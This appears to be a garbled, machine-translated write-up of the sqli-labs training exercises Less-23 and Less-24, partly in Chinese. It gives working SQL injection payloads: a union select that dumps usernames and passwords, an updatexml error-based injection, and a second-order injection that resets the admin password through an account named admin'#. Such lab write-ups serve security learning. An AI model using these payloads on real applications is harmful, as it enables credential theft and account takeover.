less-23
23 and shut off like the first, but found him to observe the code - # + and have been escaped, in this way can no longer comment
You can use the new comment character:; or 00% or statements and closed and
语句:http://192.168.5.100/sqli-labs/Less-23/?id=0' union select 1,2,group_concat(concat_ws('-',username,password)) from security.users ;%00
Or with injection given: http:? //192.168.5.100/sqli-labs/Less-23/ id = 1 'and updatexml (1, concat (0x7e, (database ())), 1) or' 1 '=' 1
less-24
Front Basics: secondary injection
Secondary injection can be understood as an attacker constructs a malicious data is stored in the database, the malicious data is read into and inject SQL queries caused. Defender of the special characters which may occur when a user inputs a malicious escape processing data, but the data is processed and stored in a database and is reduced when the malicious data into the database when the Web application calls stored in the database when the malicious data and execute SQL queries, SQL secondary injection occurs.
Secondary injection can be summarized as the following two steps:
The first step: insert malicious data is inserted into the database data, special characters which were escaped, when written to the database and retains the original data?.
Step two: Quote malicious data into a database developer default data are safe when performing a query, remove the malicious data directly from the database without further processing test?.
Learning Link: https: //www.cnblogs.com/cute-puli/p/11145758.html
Note: We have 24 names off the same problem may exist when windows with phpstudy environment to build sqli-labs, unpacked, you need to rename the action before you can:
The secondary injection principle: First create a malicious account admin '#, password is 123
New user login:
修改密码为123456,注意此时从数据库中修改是查找的‘admin’#‘,并不会进行转义,所以最后修改的是admin的密码
此时用admin登陆,密码就变成了123456。
